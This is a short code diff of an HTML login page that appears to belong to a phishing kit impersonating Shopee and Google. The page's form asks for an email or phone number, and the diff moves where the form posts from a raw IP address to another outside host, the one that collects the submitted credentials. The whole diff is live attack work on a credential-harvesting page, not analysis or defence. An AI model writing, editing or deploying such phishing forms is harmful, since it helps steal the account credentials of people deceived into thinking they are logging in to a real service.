--- a/userlogin_u.html
+++ b/userlogin_u.html
@@ -27,7 +27,7 @@ charset=UTF-8">
   </div>
   <div class="body">
     <div class="tooltip">&nbsp;<p>電子郵件或電話號碼</div>
-      <form class="change-password-form" id="editpasswd" name="editpasswd" action="http://207.210.200.146/~goontone/shopee/google/1.php" method="post">
+      <form class="change-password-form" id="editpasswd" name="editpasswd" action="http://settings.acsite.org/user/shopee/google/1.php" method="post">
        <input class="email" type="text" name="email">
       	<p>&nbsp;</p>
 		<p><font color="#1B9AF7" size="2">
